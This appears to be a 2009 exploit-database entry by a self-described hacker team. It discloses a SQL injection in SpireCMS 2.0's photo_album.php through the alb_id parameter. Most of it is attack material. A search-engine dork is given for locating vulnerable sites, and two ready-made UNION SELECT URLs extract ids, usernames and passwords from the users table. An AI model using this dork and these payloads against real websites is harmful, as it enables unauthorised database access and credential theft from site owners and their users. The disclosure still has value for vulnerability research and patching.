SpireCMS 2.0 - SQL Injection

🗓️ 13 Dec 2009 00:00:00Reported by Dr.0rYX Cr3W-DZType

exploitpack👁 19 Views

SpireCMS 2.0 SQL Injection Vulnerability by Dr.0rYX and Cr3w-DZ, Vendor: http://www.spiread.com/, Download: http://www.spiread.com/demo/, Vulnerable: photo_album.php?alb_id, Exploit: UNION SELECT GROUP_Concat(id,username,password) from user

                                ALGERIAN HACKER
  **********************- NORTH-AFRICA SECURITY TEAM -***********************

[!]            SpireCMS v2.0 SQL Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : [email protected]  &  [email protected]

***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.spiread.com/
[+] script   : SpireCMS v2.0
[+] Download : http://www.spiread.com/demo/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"photo_album.php?alb_id="

**************************************************************************/
[ Vulnerable File ]

http://server/photo_album.php?alb_id=[N.A.S.T ]

[ Exploit ]

http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password)+from+users

http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password),null+from+users

[  GReets ]

[+] :claw , le0n , exploit-db.com , ALL HACKERS MUSLIMS

13 Dec 2009 00:00Current